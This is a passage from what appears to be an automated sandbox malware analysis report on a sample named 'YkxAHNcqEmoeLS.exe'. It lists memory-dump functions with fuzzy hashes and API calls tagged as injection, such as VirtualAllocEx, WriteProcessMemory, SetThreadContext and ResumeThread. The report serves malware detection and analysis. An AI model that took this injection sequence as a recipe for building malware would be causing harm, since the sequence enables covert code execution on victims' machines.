Function 00CCD64F Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2616926032.0000000000CCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CCD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_ccd000_build.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b4df52cb15700b59c5b6b401fa95ea1d4e97f6e18881beb99e30f99f1fcf6035
Instruction ID: 450d7e1725efea09ba4ece08e85dee587413f7d7f1cfef92f768222ae823d257
Opcode Fuzzy Hash: b4df52cb15700b59c5b6b401fa95ea1d4e97f6e18881beb99e30f99f1fcf6035
Instruction Fuzzy Hash: 9D21AF76504280DFCB16CF10D9C4B16BF72FB88314F24C6A9D9494B25AC33AD966DBA2

Function 00CCD3D3 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2616926032.0000000000CCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CCD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_ccd000_build.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
Instruction ID: 56e5153f0294b284af1bcae746593fac8f18f654fbc0493b5bf436850a7fe898
Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
Instruction Fuzzy Hash: 9C110372404240DFCB06CF00D9C4B16BF71FB94324F24C6ADD90A0B256C33AE95ACBA2

Function 00CCD989 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2616926032.0000000000CCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CCD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_ccd000_build.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e6dd50a0c7b0ddf4ebecf0f97a6e775247344f39f2ac8022d74c4b01ff8b0453
Instruction ID: c3b97ef1b8cd74a4f90ab309dd9c64f01cc2b984c0d3484d3801518491e0f72f
Opcode Fuzzy Hash: e6dd50a0c7b0ddf4ebecf0f97a6e775247344f39f2ac8022d74c4b01ff8b0453
Instruction Fuzzy Hash: 4F01F735004340AAE7209E1AC984F67BF98EF45320F18C47EED1A4A286CA399840C671

Function 00CCD988 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2616926032.0000000000CCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CCD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_ccd000_build.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c507a6df22636722d8606e5013dc8234c7c4210439dc33e5a4b6858b264d4e37
Instruction ID: c8942b537a76055d7e6a485dcabd1fb17d25e59d1947f5cc1e1d0b9bb81782db
Opcode Fuzzy Hash: c507a6df22636722d8606e5013dc8234c7c4210439dc33e5a4b6858b264d4e37
Instruction Fuzzy Hash: 39F0CD71004344AAEB208A0AD884B66FFA8EF51324F18C46EEE494A286C2799840CAB1

Analysis Process: YkxAHNcqEmoeLS.exePID: 892, Parent PID: 1068COMMON

Execution Graph

Execution Coverage:	10.4%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	145
Total number of Limit Nodes:	9

Executed Functions

Function 0A3C0448 Relevance: .6, Instructions: 628COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2191127664.000000000A3C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A3C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_a3c0000_YkxAHNcqEmoeLS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 88ac9c3967ffe3d8f2465908ba21aa9f3c501307f65d2d4985762f0155fe95a7
Instruction ID: 988aa5c462e804201caeaad55b6ea7add1cafd791e95601d65f806c1ff585fc4
Opcode Fuzzy Hash: 88ac9c3967ffe3d8f2465908ba21aa9f3c501307f65d2d4985762f0155fe95a7
Instruction Fuzzy Hash: 2232AA30B012449FDB19DB69D990BAEBBF6AF8A300F14446DE506DB3A1EB34ED01CB51

Function 00A1D417 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 00A1D496
GetCurrentThread.KERNEL32 ref: 00A1D4D3
GetCurrentProcess.KERNEL32 ref: 00A1D510
GetCurrentThreadId.KERNEL32 ref: 00A1D569

Strings

}\g(, xrefs: 00A1D434

Memory Dump Source

Source File: 0000000A.00000002.2178970693.0000000000A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_a10000_YkxAHNcqEmoeLS.jbxd

Similarity

API ID: Current$ProcessThread
String ID: }\g(
API String ID: 2063062207-3267241235
Opcode ID: ace371f77bbc19f03fe3fb4fe56de7696d5de7aa583f37484759e68c3fcde79a
Instruction ID: 5cb637391578f843e7b0da49592768b86f68279a798057a76de50c813b72547b
Opcode Fuzzy Hash: ace371f77bbc19f03fe3fb4fe56de7696d5de7aa583f37484759e68c3fcde79a
Instruction Fuzzy Hash: 975148B09002098FDB14DFA9D548BEEBBF1FF88314F208459D419A7360D774A988CB65

Function 00A1D418 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 00A1D496
GetCurrentThread.KERNEL32 ref: 00A1D4D3
GetCurrentProcess.KERNEL32 ref: 00A1D510
GetCurrentThreadId.KERNEL32 ref: 00A1D569

Strings

}\g(, xrefs: 00A1D434

Memory Dump Source

Source File: 0000000A.00000002.2178970693.0000000000A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_a10000_YkxAHNcqEmoeLS.jbxd

Similarity

API ID: Current$ProcessThread
String ID: }\g(
API String ID: 2063062207-3267241235
Opcode ID: d6c717eccf47cf17be70df0eb8ec15766c2207b45aacc4233e7b730215340484
Instruction ID: 936fc91974037dfcff39ac9b43ca9c4e46b77126b4a81af3cdf8851d66f1f711
Opcode Fuzzy Hash: d6c717eccf47cf17be70df0eb8ec15766c2207b45aacc4233e7b730215340484
Instruction Fuzzy Hash: 6E5148B09003098FDB14DFAAD548BEEBBF5FF88314F208459D419A7360D774A988CB65

Function 06C6BE63 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 260
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06C6C09E

Strings

}\g(, xrefs: 06C6BED2
}\g(, xrefs: 06C6BEA3

Memory Dump Source

Source File: 0000000A.00000002.2188465395.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c60000_YkxAHNcqEmoeLS.jbxd

Similarity

API ID: CreateProcess
String ID: }\g($}\g(
API String ID: 963392458-2537115742
Opcode ID: 02d3efbc9c73fc68bbfa25a07b2a26164259486a16082abdac3c2e3529845a91
Instruction ID: 091fa160ec6395e1383a4079fece4e91301299376b8f65f6e2d372b99f649dfb
Opcode Fuzzy Hash: 02d3efbc9c73fc68bbfa25a07b2a26164259486a16082abdac3c2e3529845a91
Instruction Fuzzy Hash: 20A18D75D00219CFDB60CFA9C8817EDBBB2BF44314F1485AAE818A7250DB749A95CF92

Function 06C6BE68 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 243
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06C6C09E

Strings

}\g(, xrefs: 06C6BED2
}\g(, xrefs: 06C6BEA3

Memory Dump Source

Source File: 0000000A.00000002.2188465395.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c60000_YkxAHNcqEmoeLS.jbxd

Similarity

API ID: CreateProcess
String ID: }\g($}\g(
API String ID: 963392458-2537115742
Opcode ID: 8e7c7b4605c9c160f856dc2b404f4ec654de92514bf5e931cae2878c4585e439
Instruction ID: 1f3f9a5f6bfa763182fa2899f4b23fba0810bb7bb5381a7b83825d131b8dd95c
Opcode Fuzzy Hash: 8e7c7b4605c9c160f856dc2b404f4ec654de92514bf5e931cae2878c4585e439
Instruction Fuzzy Hash: 92918E75D00219CFDB60CFA9C8817EDBBB2BF44314F04856AE848E7250DB749A95CF92

Function 00A1590C Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 101
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 00A159C9

Strings

}\g(, xrefs: 00A1594C

Memory Dump Source

Source File: 0000000A.00000002.2178970693.0000000000A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_a10000_YkxAHNcqEmoeLS.jbxd

Similarity

API ID: Create
String ID: }\g(
API String ID: 2289755597-3267241235
Opcode ID: c90237c48fd538dd4474d2830a473aeefbacc7a087b6213986d0f0e28345a77c
Instruction ID: 76d0e7a27649bb7525a79d3bcaa936da9c94277bc494cca31767a502e935164c
Opcode Fuzzy Hash: c90237c48fd538dd4474d2830a473aeefbacc7a087b6213986d0f0e28345a77c
Instruction Fuzzy Hash: AA41F2B0C00619CFDB24CFA9C888BDEBBB5FF89704F20855AD409AB255DB756986CF50

Function 00A144B4 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 00A159C9

Strings

}\g(, xrefs: 00A1594C

Memory Dump Source

Source File: 0000000A.00000002.2178970693.0000000000A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_a10000_YkxAHNcqEmoeLS.jbxd

Similarity

API ID: Create
String ID: }\g(
API String ID: 2289755597-3267241235
Opcode ID: 58a405d45dc1bee3feae30b32fd5cfa95185d95c2708ec6239eb14cb40f26dfc
Instruction ID: ad2664fdb33c9c4d5bc0d2bb23b4eff9da0dee31b1defc4f88ecd65ff8282574
Opcode Fuzzy Hash: 58a405d45dc1bee3feae30b32fd5cfa95185d95c2708ec6239eb14cb40f26dfc
Instruction Fuzzy Hash: AB41F2B0C00619CBDB24CFA9C888BDDBBF5BF88304F20855AD409AB255DB756986CF91

Function 06C6BBDF Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 70
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06C6BC70

Strings

}\g(, xrefs: 06C6BBFF

Memory Dump Source

Source File: 0000000A.00000002.2188465395.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c60000_YkxAHNcqEmoeLS.jbxd

Similarity

API ID: MemoryProcessWrite
String ID: }\g(
API String ID: 3559483778-3267241235
Opcode ID: 3f65ce2287e374865a468bd8dea3277043d332709a0b81370faef52f4dbae278
Instruction ID: 1b2a699fc49ad4d7209883526af578a079d51377ca722f1a8be9db71d271728b
Opcode Fuzzy Hash: 3f65ce2287e374865a468bd8dea3277043d332709a0b81370faef52f4dbae278
Instruction Fuzzy Hash: 95213BB5D003099FCB10DFAAC885BDEBBF5FF48310F108429E519A7250C7789A54CBA4

Function 06C6BBE0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 69
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06C6BC70

Strings

}\g(, xrefs: 06C6BBFF

Memory Dump Source

Source File: 0000000A.00000002.2188465395.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c60000_YkxAHNcqEmoeLS.jbxd

Similarity

API ID: MemoryProcessWrite
String ID: }\g(
API String ID: 3559483778-3267241235
Opcode ID: 26da49d4b5ae9ab802d4319ecc0f4ec62cdd36e99c5acd174023127c6d2aba5b
Instruction ID: 3c5755af4820384bf2ca13b93fff55a06dce1046ffa11e2e20e7f05b69b16c43
Opcode Fuzzy Hash: 26da49d4b5ae9ab802d4319ecc0f4ec62cdd36e99c5acd174023127c6d2aba5b
Instruction Fuzzy Hash: 6C2119B5D003499FCB10DFAAC885BEEBBF5FF48310F508429E919A7250D7789A54CBA4

Function 06C6B60B Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 66
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06C6B68E

Strings

}\g(, xrefs: 06C6B62C

Memory Dump Source

Source File: 0000000A.00000002.2188465395.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c60000_YkxAHNcqEmoeLS.jbxd

Similarity

API ID: ContextThreadWow64
String ID: }\g(
API String ID: 983334009-3267241235
Opcode ID: a4e0aeef7ae1a4fc7e385ae3d7795365735ee44a268b2a2f0f3e61c63832615d
Instruction ID: 248a4b3953f5498f531303ff1fff9936f8fd5689f88066c6e34b0bb819baa93f
Opcode Fuzzy Hash: a4e0aeef7ae1a4fc7e385ae3d7795365735ee44a268b2a2f0f3e61c63832615d
Instruction Fuzzy Hash: 28215971D002098FDB14DFAAC485BEEBBF4EF48314F14842DE419A7240CB789944CFA5

Function 06C6B610 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06C6B68E

Strings

}\g(, xrefs: 06C6B62C

Memory Dump Source

Source File: 0000000A.00000002.2188465395.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c60000_YkxAHNcqEmoeLS.jbxd

Similarity

API ID: ContextThreadWow64
String ID: }\g(
API String ID: 983334009-3267241235
Opcode ID: db4ca61bc3a5afe0e5d2fa57ede312dc59388425178169bfd7cc20bebd131acd
Instruction ID: f6695c2e8c7df210d47fa7dea4e7ee0fd3c1a8c7477cd6856d959fa74800783b
Opcode Fuzzy Hash: db4ca61bc3a5afe0e5d2fa57ede312dc59388425178169bfd7cc20bebd131acd
Instruction Fuzzy Hash: 472115B1D002098FDB54DFAAC485BEEBBF4EF48314F14842AE519A7240DB78A945CFA5

Function 06C6BCD0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06C6BD50

Strings

}\g(, xrefs: 06C6BCEF

Memory Dump Source

Source File: 0000000A.00000002.2188465395.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c60000_YkxAHNcqEmoeLS.jbxd

Similarity

API ID: MemoryProcessRead
String ID: }\g(
API String ID: 1726664587-3267241235
Opcode ID: 5653abdf2ef7e5ced8803c1ba7c75ca4f01d0cf48e3620eb01c57761bb05b7e4
Instruction ID: fd4fd962dba9b2281dddf99e149c759a309d516bde3158887a36bc4ae8995caf
Opcode Fuzzy Hash: 5653abdf2ef7e5ced8803c1ba7c75ca4f01d0cf48e3620eb01c57761bb05b7e4
Instruction Fuzzy Hash: 1D21F5B1C002499FCB10DFAAC885AEEFBF5FF48310F50842AE519A7250D7789954CBA5

Function 06C6889F Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 62windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 06C6F3CD

Strings

}\g(, xrefs: 06C6F38A

Memory Dump Source

Source File: 0000000A.00000002.2188465395.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c60000_YkxAHNcqEmoeLS.jbxd

Similarity

API ID: MessagePost
String ID: }\g(
API String ID: 410705778-3267241235
Opcode ID: 5da2421977762fe2451e09ed4bf8bbf524018462e47098540d15a0a8cfe6799e
Instruction ID: 66b80e051af16be4db36d032b5410b868e887dcdf1d098051be30180a5c674d7
Opcode Fuzzy Hash: 5da2421977762fe2451e09ed4bf8bbf524018462e47098540d15a0a8cfe6799e
Instruction Fuzzy Hash: A32124B58043489FCB10DF9AD888BDEBFF8EB49310F14845AE564A7251D378A944CBE5

Function 00A1D660 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00A1D6E7

Strings

}\g(, xrefs: 00A1D67F

Memory Dump Source

Source File: 0000000A.00000002.2178970693.0000000000A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_a10000_YkxAHNcqEmoeLS.jbxd

Similarity

API ID: DuplicateHandle
String ID: }\g(
API String ID: 3793708945-3267241235
Opcode ID: 6d9c351098dbf9b53c3d1b48bf813a2fff88d7555eb2532349da6ff6af84a5c9
Instruction ID: a5fd89b221dfc997576526d5040edbf7673b003668b3afe441e4c37b0a7f1f84
Opcode Fuzzy Hash: 6d9c351098dbf9b53c3d1b48bf813a2fff88d7555eb2532349da6ff6af84a5c9
Instruction Fuzzy Hash: 9E21C2B59002499FDB10CFAAD984ADEBBF9FB48310F14841AE918A7350D378A954CFA5

Function 00A1D65F Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00A1D6E7

Strings

}\g(, xrefs: 00A1D67F

Memory Dump Source

Source File: 0000000A.00000002.2178970693.0000000000A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_a10000_YkxAHNcqEmoeLS.jbxd

Similarity

API ID: DuplicateHandle
String ID: }\g(
API String ID: 3793708945-3267241235
Opcode ID: 640c5d2cd58844e98eef17cf3116eb8b305544fbcb3f419603edd65dddb923e1
Instruction ID: a9e0e08592c8c6caf13525ac31504315428f51e2b4cf01b58a4b26d4db5ce460
Opcode Fuzzy Hash: 640c5d2cd58844e98eef17cf3116eb8b305544fbcb3f419603edd65dddb923e1
Instruction Fuzzy Hash: 7521E2B59002089FDB10CFAAD584ADEBFF4FB48310F14841AE928A7310D378A940CFA0

Function 06C6BB1F Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 54memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06C6BB8E

Strings

}\g(, xrefs: 06C6BB37

Memory Dump Source

Source File: 0000000A.00000002.2188465395.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c60000_YkxAHNcqEmoeLS.jbxd

Similarity

API ID: AllocVirtual
String ID: }\g(
API String ID: 4275171209-3267241235
Opcode ID: 43bf7623259cf82a6b2805d3f67fc27871f8dff3d51faf5da96984b72d2d5d40
Instruction ID: 46f67d90e74dbae41368f6e4e29568f028f0481e84302192754ceedca46fa746
Opcode Fuzzy Hash: 43bf7623259cf82a6b2805d3f67fc27871f8dff3d51faf5da96984b72d2d5d40
Instruction Fuzzy Hash: BD1137758002499FCB10DFAAC845BEFBFF5EF88310F108819E519A7250CB79A950CFA1

Function 06C6BB20 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06C6BB8E

Strings

}\g(, xrefs: 06C6BB37

Memory Dump Source

Source File: 0000000A.00000002.2188465395.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c60000_YkxAHNcqEmoeLS.jbxd

Similarity

API ID: AllocVirtual
String ID: }\g(
API String ID: 4275171209-3267241235
Opcode ID: dff13419c556a92f84a6dbf616de7af9c23975777f421719aaa0d685d4d7cec5
Instruction ID: b942b292bc034b132846f9089ffee837c887fe705830f9c2f0db9eff4438e042
Opcode Fuzzy Hash: dff13419c556a92f84a6dbf616de7af9c23975777f421719aaa0d685d4d7cec5
Instruction Fuzzy Hash: 821137718002499FCB10DFAAC844BEEBFF5EF88310F108819E519A7250CB79A950CFA0

Function 06C6B55F Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 50threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 06C6B5C2

Strings

}\g(, xrefs: 06C6B577

Memory Dump Source

Source File: 0000000A.00000002.2188465395.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c60000_YkxAHNcqEmoeLS.jbxd

Similarity

API ID: ResumeThread
String ID: }\g(
API String ID: 947044025-3267241235
Opcode ID: 1d39698d76d79e0ac45c42776b4d59df044c782f2a3e9aa81b8a36d587866ae6
Instruction ID: c3049f3ce78d71b41c4ffac6505921692c3f42152a8aab65dc5bb221333d238f
Opcode Fuzzy Hash: 1d39698d76d79e0ac45c42776b4d59df044c782f2a3e9aa81b8a36d587866ae6
Instruction Fuzzy Hash: 49113AB1D002488FCB20DFAAC4457EEFBF5EF88314F208419D519A7240CB79A944CFA5

Function 06C6B560 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 06C6B5C2

Strings

}\g(, xrefs: 06C6B577

Memory Dump Source

Source File: 0000000A.00000002.2188465395.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c60000_YkxAHNcqEmoeLS.jbxd

Similarity

API ID: ResumeThread
String ID: }\g(
API String ID: 947044025-3267241235
Opcode ID: 7f1699693e4c3ab3de87b4d0b43db223316b8c1bbb0f0aa41587dc9846bf1823
Instruction ID: b5d4c98c9b350a06be5dc496b0cb67be0682139972321629934b88510b8fd2e3
Opcode Fuzzy Hash: 7f1699693e4c3ab3de87b4d0b43db223316b8c1bbb0f0aa41587dc9846bf1823
Instruction Fuzzy Hash: B6113AB1D002488FCB10DFAAC4457EEFBF5EF88314F208419D519A7240CB79A944CFA5

Function 06C68880 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 06C6F3CD

Strings

}\g(, xrefs: 06C6F38A

Memory Dump Source

Source File: 0000000A.00000002.2188465395.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c60000_YkxAHNcqEmoeLS.jbxd

Similarity

API ID: MessagePost
String ID: }\g(
API String ID: 410705778-3267241235
Opcode ID: 48b02a1d960973f06fe4df8b80511e16fa12a866b0de20e29df7e0c0e4c42366
Instruction ID: 8a4c269359886537dd5c4da1c528d2248b44e6f45b3c1ebd56f86db016b60859
Opcode Fuzzy Hash: 48b02a1d960973f06fe4df8b80511e16fa12a866b0de20e29df7e0c0e4c42366
Instruction Fuzzy Hash: CB1106B58003489FDB50DF9AD489BDEBBF8FB48310F10845AE518A7210C379A944CFA5

Function 00A1AF77 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 00A1AFDE

Strings

}\g(, xrefs: 00A1AF97

Memory Dump Source

Source File: 0000000A.00000002.2178970693.0000000000A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_a10000_YkxAHNcqEmoeLS.jbxd

Similarity

API ID: HandleModule
String ID: }\g(
API String ID: 4139908857-3267241235
Opcode ID: 587747bb2e9662a77084d063dd6677024e1e87f15bf2ecaabf68ed7a59f1dc12
Instruction ID: 7894f15beafd3644fdac5e53996ad2f64039be08399596acc02076da94a07462
Opcode Fuzzy Hash: 587747bb2e9662a77084d063dd6677024e1e87f15bf2ecaabf68ed7a59f1dc12
Instruction Fuzzy Hash: 6C11F2B6C016498FCB10DF9AD444BDEFBF4EF88324F10845AD429A7614D379A586CFA1

Function 00A1AF78 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 00A1AFDE

Strings

}\g(, xrefs: 00A1AF97

Memory Dump Source

Source File: 0000000A.00000002.2178970693.0000000000A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_a10000_YkxAHNcqEmoeLS.jbxd

Similarity

API ID: HandleModule
String ID: }\g(
API String ID: 4139908857-3267241235
Opcode ID: 012eba0feeb9d21a91f113c49a6b7dfd18d718a2a4e0820881eca6427a12d90c
Instruction ID: 414af06b06051fa870168997787485f7ad86f72aa1b907160c7b4939ae281c19
Opcode Fuzzy Hash: 012eba0feeb9d21a91f113c49a6b7dfd18d718a2a4e0820881eca6427a12d90c
Instruction Fuzzy Hash: ED11E0B6C016498FCB10DF9AC444BDEFBF4EF88324F10845AD429A7614D379A585CFA1

Function 06C6BCCB Relevance: 1.5, APIs: 1, Instructions: 32COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06C6BD50

Memory Dump Source

Source File: 0000000A.00000002.2188465395.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c60000_YkxAHNcqEmoeLS.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: af20dddb2aa4ab05a1e88ebb5d2c45f72c5a588f869a2ff0599ecc68dbc166a7
Instruction ID: 113a75d0792e3d7acbc8ea2b25fdcb59b47ac056d47e37af5f6872e872bf91cf
Opcode Fuzzy Hash: af20dddb2aa4ab05a1e88ebb5d2c45f72c5a588f869a2ff0599ecc68dbc166a7
Instruction Fuzzy Hash: 65F02473C003448EDB20DFAAD8443DDBBE0BF85324F14841AC058A7192C7388A45CB71

Function 009BD3D8 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2178538235.00000000009BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 009BD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9bd000_YkxAHNcqEmoeLS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ffaf94f0b29d2f5471db3cab4c61ecbd58dee724bc69aa2868dde5cade619935
Instruction ID: 6579c1986e03eb053d8bb87a90db85ddb28ce605173cd83b8075435642749d9c
Opcode Fuzzy Hash: ffaf94f0b29d2f5471db3cab4c61ecbd58dee724bc69aa2868dde5cade619935
Instruction Fuzzy Hash: 15213A71500204DFDB05DF14DAC0F66BF6AFB98334F20C569D9090B2A6D33AE856D7A2

Function 009BD4C4 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2178538235.00000000009BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 009BD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9bd000_YkxAHNcqEmoeLS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3359998bc9762152e9587fc3c020e40e867ab79a69c7f16467bc614f1867d387
Instruction ID: 932ab0d51efb5714084c6053e11876f9908e4e1c3aa345d83bc8ccb97665146d
Opcode Fuzzy Hash: 3359998bc9762152e9587fc3c020e40e867ab79a69c7f16467bc614f1867d387
Instruction Fuzzy Hash: 2C216771500204DFCB25DF14CAC0F66BF69FB98328F20C569E8090B25AD37AD806CBB2

Function 009CD01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2178620812.00000000009CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 009CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9cd000_YkxAHNcqEmoeLS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ed5395a959e71e99559a44b03792beb2c0791562c65afa29843148f7fa886e74
Instruction ID: 7199d36ec1351bc3e73a6340c44de0074f60a4fa00768905f33880675fff5386
